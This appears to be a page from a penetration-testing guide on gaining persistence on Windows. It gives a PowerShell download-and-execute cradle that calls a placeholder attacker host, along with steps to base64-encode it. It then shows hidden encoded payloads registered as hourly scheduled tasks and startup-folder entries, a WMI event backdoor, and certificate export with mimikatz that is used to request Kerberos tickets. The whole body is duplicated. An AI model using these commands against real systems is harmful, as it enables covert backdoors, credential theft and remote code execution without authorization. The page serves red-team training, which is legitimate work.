The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Encoding commands
  • Task Scheduler
  • StartUp Folder
  • WMI
  • Certificates
  • User
  • Computer
  • Task Scheduler
  • StartUp Folder
  • WMI
  • Certificates
  • User
  • Computer
  1. Persistance

Windows

Encoding commands

In most cases, the commands you want to execute might have special characters, so the best way is to encode them to avoid errors while executing.

  • Windows

$str = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
  • Linux

str='IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0

Task Scheduler

A task that will be executed hourly.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

StartUp Folder

This command will be executed once the user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

WMI

Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad.

Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

User

1. Enumerate the certificates on the machine

.\Seatbelt.exe Certificates

2. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz"

.\mimikatz.exe "crypto::certificates /export" "exit"

3. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

4. Use Rubeus to obtain a TGT.

.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>

Computer

You must be admin

1. Extract the machine certificates.

.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

2. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

3. Request a TGT

.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT> 

Task Scheduler

A task that will be executed hourly.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

StartUp Folder

This command will be executed once the user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

WMI

Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad.

Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

User

1. Enumerate the certificates on the machine

.\Seatbelt.exe Certificates

2. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz"

.\mimikatz.exe "crypto::certificates /export" "exit"

3. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

4. Use Rubeus to obtain a TGT.

.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>

Computer

You must be admin 1. Extract the machine certificates.

.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

2. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

3. Request a TGT

.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT> 

Last updated 1 year ago